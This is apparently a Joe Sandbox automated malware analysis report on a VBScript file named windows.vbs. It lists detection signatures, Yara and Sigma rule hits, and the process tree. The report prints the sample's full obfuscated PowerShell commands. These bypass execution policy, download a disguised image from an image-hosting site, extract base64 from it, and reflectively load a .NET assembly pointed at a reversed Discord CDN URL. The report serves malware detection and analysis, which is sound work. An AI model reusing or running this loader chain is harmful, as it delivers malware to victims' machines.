Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
windows.vbs

Overview

General Information

Sample name:windows.vbs
Analysis ID:1446639
MD5:8a5e37c6fd7a447899334a45c67e6478
SHA1:addb4be872ec8a1e7e93cc2b838d135dc8aa8866
SHA256:cea70e9ba4598a0d3b730237fc235a4f96ab7db9d0e69915b496171a7f479999
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected VBS Downloader Generic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive JS / VBS script found (domain check)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6696 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreMDgTreBmDgTreDDgTreDgTreMDgTreBjDgTreGQDgTreMgBhDgTreDMDgTreMDgTreDgTrexDgTreDkDgTreOQBjDgTreDcDgTreOQDgTre2DgTreDUDgTreMwDgTre0DgTreDMDgTreNgDgTre2DgTreDMDgTreZQBmDgTreGIDgTreODgTreDgTre4DgTreGUDgTreZgDgTre1DgTreGEDgTreNDgTreDgTre5DgTreDDgTreDgTreMQDgTre2DgTreDQDgTreMgBlDgTreDcDgTreZQBlDgTreDUDgTreZgDgTre5DgTreDcDgTreZDgTreDgTre1DgTreDgDgTreNDgTreDgTrewDgTreGUDgTreODgTreBhDgTreGEDgTreZDgTreDgTrexDgTreGUDgTreZQBhDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreDDgTreDgTreZgBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreDDgTreDgTreNwBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreMwDgTrexDgTreDQDgTreNgDgTre3DgTreDkDgTreNgDgTre4DgTreDYDgTreMgDgTre2DgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
windows.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 6312JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6312INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xa4144:$b2: ::FromBase64String(
      • 0xa4b1a:$b2: ::FromBase64String(
      • 0xa5cac:$b2: ::FromBase64String(
      • 0xa6360:$b2: ::FromBase64String(
      • 0xa6b20:$b2: ::FromBase64String(
      • 0xa7188:$b2: ::FromBase64String(
      • 0x112c73:$b2: ::FromBase64String(
      • 0xa3fa9:$b3: ::UTF8.GetString(
      • 0xa497f:$b3: ::UTF8.GetString(
      • 0xa5b11:$b3: ::UTF8.GetString(
      • 0xa61c5:$b3: ::UTF8.GetString(
      • 0xa6985:$b3: ::UTF8.GetString(
      • 0xa6fed:$b3: ::UTF8.GetString(
      • 0x112ad8:$b3: ::UTF8.GetString(
      • 0x17cba:$s1: -join
      • 0x21350:$s1: -join
      • 0x63711:$s3: reverse
      • 0x6f421:$s3: reverse
      • 0x90038:$s3: reverse
      • 0x98b00:$s3: reverse
      • 0xfabb1:$s3: reverse
      Process Memory Space: powershell.exe PID: 6412JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 6412INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x28939:$b2: ::FromBase64String(
        • 0x315e6:$b2: ::FromBase64String(
        • 0x3c90c:$b2: ::FromBase64String(
        • 0x3cf69:$b2: ::FromBase64String(
        • 0xba906:$b2: ::FromBase64String(
        • 0xbb0d9:$b2: ::FromBase64String(
        • 0xbd4cd:$b2: ::FromBase64String(
        • 0xbdae4:$b2: ::FromBase64String(
        • 0xbee4b:$b2: ::FromBase64String(
        • 0xc176a:$b2: ::FromBase64String(
        • 0xc1d54:$b2: ::FromBase64String(
        • 0x2879e:$b3: ::UTF8.GetString(
        • 0x3144b:$b3: ::UTF8.GetString(
        • 0x3c771:$b3: ::UTF8.GetString(
        • 0x3cdce:$b3: ::UTF8.GetString(
        • 0xba76b:$b3: ::UTF8.GetString(
        • 0xbaf3e:$b3: ::UTF8.GetString(
        • 0xbd332:$b3: ::UTF8.GetString(
        • 0xbd949:$b3: ::UTF8.GetString(
        • 0xbecb0:$b3: ::UTF8.GetString(
        • 0xc15cf:$b3: ::UTF8.GetString(
        SourceRuleDescriptionAuthorStrings
        amsi64_6412.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Spreading

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgT